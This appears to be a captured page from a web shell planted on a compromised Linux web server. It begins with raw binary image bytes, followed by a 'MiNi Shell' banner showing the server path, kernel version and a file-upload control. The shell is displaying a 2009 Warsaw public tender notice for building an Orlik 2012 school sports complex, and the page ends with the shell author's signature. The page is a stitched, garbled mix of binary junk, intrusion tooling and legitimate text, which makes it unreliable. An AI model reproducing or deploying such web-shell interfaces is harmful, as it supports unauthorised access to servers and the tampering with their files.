JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090714/238162-N-2009.html

<p class="kh_header"><b>Warszawa: Wykonanie projektu budowlanego i budowa kompleksu sportowego na terenie boiska szkolnego przy ulicy Szanajcy 5 w Warszawie - w ramach programu ,,Moje Boisko - Orlik 2012</b><br>
<b>Numer ogłoszenia: 238162 - 2009; data zamieszczenia: 14.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto st. Warszawa Dzielnica Praga Północ , ul. ks. I. Kłopotowskiego 15, 00-987 Warszawa, woj. mazowieckie, tel. 022 5900210, 59-00214, faks 022 5900215.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu budowlanego i budowa kompleksu sportowego na terenie boiska szkolnego przy ulicy Szanajcy 5 w Warszawie - w ramach programu ,,Moje Boisko - Orlik 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie projektu budowlanego z wymaganymi uzgodnieniami wraz z uzyskaniem pozwolenia na budowę i wybudowanie kompleksu sportowego wraz z montażem modułowych budynków sanitarno- szatniowych na potrzeby zaplecza - w ramach budowy kompleksu Moje Boisko- Orlik 2012.

Miejsce wykonania robót: Warszawa, na terenie boiska szkolnego przy Zespole Szkół Nr 14, ul. Szanajcy 5, na działce nr ewid. 172 w obrębie 4-12-01.

Realizacja zadania powinna spełniać wymogi programowe Ministerstwa Sportu i Turystyki z dostosowaniem typowej dokumentacji projektowej Programu opublikowanej na stronach internetowych Ministerstwa www.orlik2012.pl do warunków miejscowych.

Przedmiot zamówienia obejmuje:

      1)  Opracowanie wraz z uzgodnieniami, w tym i z Zamawiającym, projektu budowlanego wraz z dokumentacją budowlano wykonawczą na przedmiotowy zakres prac, łącznie z opracowaniem planu zagospodarowania terenu wraz z uzbrojeniem terenu oraz uzyskanie na rzecz Zamawiającego i w jego imieniu pozwolenia budowy (zgłoszenia budowy), wycinki czy pielęgnacji drzew.         
Opracowanie należy wykonać jako adaptację projektu typowego budowy kompleksu sportowego opracowanego w ramach Programu Moje Boisko - Orlik 2012 (do 
pobrania nieodpłatnie ze stron internetowych Ministerstwa Sportu i Turystyki 
www.orlik2012.pl

2)  Budowę boiska do piłki nożnej o wymiarach 30,0 m x 62,0m o pow. całkowitej   
1860m2 ( pole gry 26,0 x 56,0 m):
- podbudowa przepuszczalna, 
- nawierzchnia do piłki nożnej - sztuczna trawa.
Wysokość włókna min. 60 mm na podbudowie z kruszywa (wypełnienie z trawy     
zgodnie z badaniem specjalistycznego laboratorium np. Labosport). 
Typ włókna: monofil, skład chemiczny włókna: polietylen, ciężar włókna: min. 11.000  
Dtex, gęstość trawy: min. 97.000 włókien /m2.
Nawierzchnia syntetyczna typu sztuczna trawa o właściwościach i technologii 
układania określonych w dokumentacji projektowej i SST wykonanych na podstawie
typowej dokumentacji projektowej Ministerstwa Sportu i Turystyki umieszczonej na
stronie internetowej www.orlik2012.pl,
- obrzeża betonowe na ławie betonowej oddzielające sąsiednie elementy terenu od płyty boiska.
Roboty należy wykonać zgodnie z dokumentacją projektową i SST wykonanych na
podstawie typowej dokumentacji projektowej Ministerstwa Sportu i Turystyki umieszczonej na stronie internetowej www.orlik2012.pl,
- wyposażenie:
bramki aluminiowe mocowane w tulejach				- 2 sztuki,
siatki do bramek                                  				- 2 sztuki.

3.  Budowę boiska wielofunkcyjnego o wymiarach 19,1 x 32,1 m o powierzchni 613,11m2 (pole do gry 15,1 x 28,1 m)
- podbudowa przepuszczalna          
Wszystkie elementy  zgodne z  właściwościami określonymi w dokumentacji 
projektowej wykonanej na podstawie typowej dokumentacji projektowej Ministerstwa Sportu i Turystyki umieszczonej na stronie internetowej  www.orlik2012.pl,
Roboty należy wykonać zgodnie z dokumentacją projektową i SST wykonanych na    
podstawie typowej dokumentacji projektowej Ministerstwa Sportu i Turystyki 
umieszczonej na stronie internetowej www.orlik2012.pl,
- nawierzchnia boiska wielofunkcyjnego:
nawierzchnia poliuretanowa wykonana o właściwościach i technologii układania   
określonych w dokumentacji projektowej i SST wykonanych na podstawie typowej   
dokumentacji projektowej Ministerstwa Sportu i Turystyki umieszczonej na stronie   
internetowej www.orlik2012.pl.
Technologie układania nawierzchni:
Technologia typu EPDM - nawierzchnia gładka, przepuszczalna dla wody wykonana dwuwarstwowo. W przypadku zastosowania podbudowy przepuszczalnej nawierzchnie tego typu należy wykonać na podbudowie elastycznej typu ET (w przypadku nieprzepuszczalnej podbudowy betonowej, asfaltowej lub asfaltowo-betonowej warstwa ET nie jest wymagana) Dolna warstwa z granulatu  SBR min 7 mm, górna warstwa wykonana z kolorowego granulatu EPDM min. 7 mm.

Wyposażenie do piłki koszykowej:
- obręcz do koszykówki standard i siatka do obręczy    	             - 2 sztuki,
- tablica do koszykówki epoksydowa o wym. 105 x 180cm		     - 2 sztuki,
- mechanizm regulacji wysokości 					             - 2 sztuki,
- konstrukcja do koszykówki dwusłupowa, montowana w tulejach 	     - 2 sztuki.

Wyposażenie  do piłki siatkowej
- słupki do siatkówki, aluminiowe wielofunkcyjne (badminton, tenis, siatkówka)									     - 2 sztuki,
- siatka do siatkówki 							     - 1 sztuka.

Wyposażenie do piłki ręcznej:
- bramki aluminiowe mocowane w tulejach				     - 2 sztuki,
- siatki do bramek                                        			     - 2 sztuki.
 
4.   Ogrodzenie terenu
Szczegółowe rozwiązania wg dokumentacji projektowej oraz SST wykonanych na   
podstawie typowej dokumentacji projektowej Ministerstwa Sportu i Turystyki  
umieszczonej na stronie internetowej www.orlik2012.pl

5.   Oświetlenie terenu 
Oświetlenie obiektu będą stanowiły projektory zamocowane na 8 masztach o wysokości min. 9m. Szczegółowe rozwiązania wg dokumentacji projektowej oraz SST wykonanych na podstawie typowej dokumentacji projektowej Ministerstwa Sportu i Turystyki umieszczonej na stronie internetowej www.orlik2012.pl

6.   Chodniki
Ciągi komunikacyjne i powierzchnia przeznaczona pod kontener (na odpadki stałe):   
- kostka polbrukowa gr. min 6 cm, na podbudowie z piasku i kruszywa, zamknięta   
obrzeżem betonowym. Szczegółowe rozwiązania wg dokumentacji projektowej oraz   
SST wykonanych na podstawie typowej dokumentacji projektowej Ministerstwa Sportu i Turystyki umieszczonej na stronie internetowej www.orlik2012.pl,
 
7.   Fundamenty pod budynek zaplecza socjalnego 
Fundamenty i roboty związane z ich wykonaniem należy wykonać zgodnie z dokumentacją projektową i SST wykonanych na podstawie typowej dokumentacji 
projektowej Ministerstwa Sportu i Turystyki umieszczonej na stronie internetowej 
www.orlik2012.pl.
 
8.   Szczegółowy opis przedmiotu zamówienia stanowią załączniki:
1)  Opis przedmiotu zamówienia
2)  Program Funkcjonalno - użytkowy 
3)  Wzór umowy
4)   typowa dokumentacja projektowa Ministerstwa Sportu i Turystyki umieszczona   
      na stronie internetowej www.orlik2012.pl.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 71.22.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w   
wysokości 15 000,00 zł. (słownie: piętnaście tysięcy złotych).   
Wadium wnosi się przed upływem terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1 ustawy Pzp., czyli:
1)   posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)   posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności:
1.  posiadają udokumentowane doświadczenie wykonywania robót budowlanych  i wykażą, iż w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali roboty budowlane polegające na budowie boisk 
sportowych (CPV 45 21 22 21-1), w tym: jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej i jednego boiska z nawierzchnią poliuretanową (z podaniem ich wartości, dat wykonania oraz odbiorców).
2.  dysponują w celu wykonania zamówienia przynajmniej 1 osobą posiadającą 
uprawnienia do kierowania robotami budowlanymi o specjalnościach:
a)   konstrukcyjno-budowlanej,
b)   instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, 
wodociągowych i kanalizacyjnych,
c)   instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i 
elektroenergetycznych,
a także są wpisane na listę członków właściwej izby samorządu zawodowego lub   
przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia z wyżej wymienionymi uprawnieniami budowlanymi;  
3)   znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. posiadają ważne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN;
4)   nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z    
formułą spełnia- nie spełnia w oparciu o oświadczenia lub dokumenty złożone przez   
Wykonawcę w celu potwierdzenia spełniania warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Spełnienie warunków udziału odnoszących się do posiadania niezbędnej wiedzy i doświadczenia,  dysponowania  osobami zdolnymi do wykonania zamówienia oraz sytuacji finansowej i ekonomicznej zostanie ocenione według poniższych zasad:
1.   udokumentowanie należytego wykonania przez Wykonawcę , w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie boisk sportowych (CPV 45 21 22 21-1), w tym: jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej i jednego boiska z nawierzchnią poliuretanową (z podaniem ich wartości, dat wykonania oraz odbiorców).
2.    dysponowanie w celu wykonania zamówienia przynajmniej po 1 osobie posiadającej uprawnienia do kierowania robotami budowlanymi o specjalnościach:
          a)   konstrukcyjno-budowlanej,
          b)   instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, 
 c)   instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i           elektroenergetycznych,
wpisanymi na listę członków właściwej izby samorządu zawodowego lub przedstawią 
pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do 
wykonania zamówienia z wyżej wymienionymi uprawnieniami budowlanymi;
3.      ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN. 
W przypadku, gdy ubezpieczenie nie obejmuje całego okresu przewidzianego na realizację przedmiotu zamówienia, Wykonawca zobowiązany jest do złożenia  pisemnego oświadczenia, że utrzymana będzie ciągłość ubezpieczenia przez cały okres wykonywania zamówienia;

Wykaz oświadczeń lub dokumentów potwierdzających spełnianie warunków w niniejszym postępowaniu.
Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 2 oraz Załącznik Nr 3 do niniejszej SIWZ.

W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy do oferty dołączyć należy:
1)  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
     ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy 
     przed upływem terminu składania ofert.

W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia do oferty dołączyć należy:
1)  Wykaz wykonanych w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie boisk sportowych (CPV 45 21 22 21-1), w tym: jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej i jednego boiska z nawierzchnią poliuretanową, z podaniem ich wartości, dat wykonania oraz odbiorców. Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.) Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 4 do niniejszej SIWZ.
2)  Wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności  - wg wzoru stanowiącego załącznik Nr 5 do SIWZ.
Do wykazu należy dołączyć dokumenty potwierdzające posiadanie uprawnień 
budowlanych do kierowania robotami budowlanymi przez wskazane osoby w  
zakresie niezbędnym do wykonania zamówienia w specjalnościach: konstrukcyjno-
budowlanej - 1 osoba, instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,   
wentylacyjnych,  wodociągowych i kanalizacyjnych - 1 osoba, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - 1 osoba, oraz zaświadczenia, wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na  listę członków   
właściwej izby.

W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia do oferty dołączyć należy:
1)   Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 500 000 PLN. 
Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie
zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN.
W przypadku, gdy ubezpieczenie nie obejmuje całego okresu przewidzianego na 
realizację przedmiotu zamówienia, Wykonawca zobowiązany jest do złożenia pisemnego oświadczenia, że utrzymana będzie ciągłość ubezpieczenia przez cały okres wykonywania zamówienia;

Wykaz oświadczeń lub dokumentów potwierdzających spełnianie warunków jakościowych, które należy dołączyć do oferty:
A.   Dokumenty dotyczące nawierzchni poliuretanowej:
       1.  Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub
            aprobata techniczna ITB, lub
            rekomendacja techniczna ITB, lub 
            wyniki badań specjalistycznego laboratorium potwierdzające parametry 
            oferowanej nawierzchni np. Labosport, lub dokument równoważny.
        2.  Karta techniczna oferowanej nawierzchni potwierdzona przez jej   
             producenta.
        3.  Atest PZH dla oferowanej nawierzchni.
        4.  Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla   
             wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji 
             udzielonej przez producenta na tę nawierzchnię.
B.   Dokumenty dotyczące nawierzchni z trawy syntetycznej:
      1.  Raport z badań przeprowadzonych przez laboratorium (Labosport lub 
           ISA-Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni,   
           potwierdzający zgodność jej parametrów z Handbook of Test Methods for 
           Football Turf (dostępny na FIFA.com).
      2.  Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub
           aprobata techniczna ITB, lub 
           rekomendacja techniczna ITB, lub
           wyniki badań specjalistycznego laboratorium potwierdzające parametry     
           oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub 
           dokument równoważny.
      3.  Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
      4.  Atest PZH dla oferowanej nawierzchni.
      5.  Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy   
           na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez 
           producenta na tę nawierzchnię..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.praga-pn.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, WOM, parter, stanowisko 18, opłata w kasie na parterze, cena 11,00 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2009 godzina 12:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, 03-708 Warszawa 
ul.ks.I.Kłopotowskiego15 pok. 339, III p. (WZP).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com